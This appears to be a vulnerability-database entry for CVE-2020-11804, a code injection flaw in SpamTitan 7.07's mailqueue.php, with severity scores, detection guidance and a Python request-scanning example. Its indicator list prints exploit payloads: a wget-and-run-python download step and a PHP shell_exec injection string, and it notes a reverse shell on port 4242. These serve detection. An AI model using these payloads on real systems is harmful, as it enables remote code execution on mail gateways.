CVE-2020-11804
published 2020-09-17


Priority: P261, high, 8.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 7.11% (93.4th percentile)
An issue was discovered in Titan SpamTitan 7.07. Due to improper sanitization of the parameter quid, used in the page mailqueue.php, code injection can occur. The input for this parameter is provided directly by an authenticated user via an HTTP GET request.

Affected

1 range
Vendor | Product | Version range | Fixed in
titanhq | spamtitan | |

Detection & IOCs (extracted from sources)

path: /mailqueue.php
path: /tmp/r.py
command: /usr/local/bin/wget <shellurl> -O /tmp/r.py;/usr/local/bin/python /tmp/r.py
path: /certs-x.php
command: gotopage+a+";$b="<b64>";shell_exec(base64_decode(urldecode($b)));die();$b="
  • Monitor HTTP GET requests to mailqueue.php containing the 'qid' parameter with shell metacharacters or command injection sequences (e.g., semicolons, pipes, backticks, dollar-sign subshells).
  • Monitor POST requests to mailqueue.php where the 'jaction' parameter contains PHP eval-injectable payloads such as shell_exec, base64_decode, or urldecode function calls.
  • Alert on POST requests to certs-x.php where the 'fname' parameter contains shell command injection patterns such as '||', '$(...)', or path traversal sequences ('../../../../').
  • Detect outbound wget or python process spawns from the SpamTitan web process (e.g., /usr/local/bin/wget writing to /tmp/) as indicators of successful RCE exploitation.
  • Monitor for reverse shell listener connections on port 4242 originating from the SpamTitan host, as the PoC defaults to this port for the reverse shell callback.
  • Inspect POST bodies to mailqueue.php for base64-encoded payloads passed to the 'jaction' field, particularly those matching the pattern 'gotopage+a+' followed by PHP injection syntax.
  • Exploitation requires prior authentication to the SpamTitan web interface; unauthenticated attackers cannot directly trigger this vulnerability.
  • The PoC exploit targets SpamTitan Gateway 7.07 running on FreeBSD; exploitation paths (e.g., /usr/local/bin/wget, /usr/local/bin/python) are FreeBSD-specific and may differ on other platforms.
  • Earlier versions of SpamTitan Gateway prior to 7.07 may also be affected, broadening the scope of detection beyond just version 7.07.
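
One way to turn the request-based monitoring items above into a check, as an added example that is not part of the CVE record or its sources. The record layout (method, URL, form body), the rule names and the function names are assumptions, and the sample requests are constructed.

```python
# Added example, not from the page's sources. Assumes each log record gives the
# method, URL and form body (e.g. a reverse proxy or WAF log that keeps POST bodies).
import re
from urllib.parse import urlsplit, parse_qs

SHELL_META = re.compile(r"[;|`]|\$\(")        # semicolon, pipe, backtick, $(
PHP_CALLS = re.compile(r"shell_exec|base64_decode|urldecode", re.I)
FNAME_BAD = re.compile(r"\|\||\$\(|(?:\.\./){4}")
QUEUE_ID_PARAMS = ("qid", "quid")             # the page uses both spellings

def check_request(method, url, body=""):
    """Return the names of the rules a single request matches."""
    parts = urlsplit(url)
    page = parts.path.rsplit("/", 1)[-1]
    # parse_qs percent-decodes, so encoded metacharacters are seen in clear
    query = parse_qs(parts.query, keep_blank_values=True)
    form = parse_qs(body, keep_blank_values=True)
    hits = []
    if page == "mailqueue.php" and method == "GET":
        values = [v for p in QUEUE_ID_PARAMS for v in query.get(p, [])]
        if any(SHELL_META.search(v) for v in values):
            hits.append("mailqueue-qid-shell-metachar")
    if page == "mailqueue.php" and method == "POST":
        if any(PHP_CALLS.search(v) for v in form.get("jaction", [])):
            hits.append("mailqueue-jaction-php-call")
    if page == "certs-x.php" and method == "POST":
        if any(FNAME_BAD.search(v) for v in form.get("fname", [])):
            hits.append("certs-x-fname-injection")
    return hits

def scan(records):
    """Return (record index, rule names) for every record that matches."""
    results = []
    for i, (method, url, body) in enumerate(records):
        hits = check_request(method, url, body)
        if hits:
            results.append((i, hits))
    return results

# Constructed sample records: (method, URL, form body)
SAMPLES = [
    ("GET", "/mailqueue.php?qid=4F2A1B9C", ""),
    ("GET", "/mailqueue.php?qid=4F2A1B9C%3Bid", ""),
    ("POST", "/mailqueue.php", "jaction=gotopage+a+%22%3Bshell_exec%28%24b%29%3B"),
    ("POST", "/certs-x.php", "fname=..%2F..%2F..%2F..%2Ftmp%2Fx"),
]

if __name__ == "__main__":
    for index, rules in scan(SAMPLES):
        print(SAMPLES[index][1], rules)
```

The process-spawn and port 4242 items need host or network telemetry and are outside what this request check covers.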

CVSS provenance

nvd | v3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P